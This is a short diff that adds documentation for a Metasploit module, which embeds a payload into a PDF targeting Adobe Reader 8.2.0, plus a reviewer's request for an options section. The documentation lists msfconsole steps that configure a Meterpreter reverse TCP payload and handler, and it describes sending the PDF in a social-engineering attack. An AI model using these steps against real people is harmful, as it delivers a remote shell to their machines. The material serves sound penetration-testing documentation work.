documentation/modules/exploit/windows/fileformat/adobe_embedded_pdf.md

```diff
@@ -0,0 +1,73 @@
+## Vulnerable Application
+
+This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.
+
+Link to vulnerable software (OldVersion)[http://www.oldversion.com/windows/download/acrobat-reader-8-2-0]
+
+## Verification Steps
+
+   1. Install application on the target machine
+   2. Start msfconsole
+   3. Do: `use exploit/windows/fileformat/adobe_pdf_embedded_exe`
+   4. Do: `set payload [windows/meterpreter/reverse_tcp]`
+   5. Do: `set LHOST [IP]`
+   6. Do: `exploit`
+   7. Do: `use [exploit/multi/handler]`
+   8. Do: `set LHOST [IP]`
+   9. Do: `exploit`
+   10. Do: `Open PDF on target machine with vulnerable software`
+
```

Comment:
Please add the options header for `infilename`, `exename`, `filename`, and `launch_message`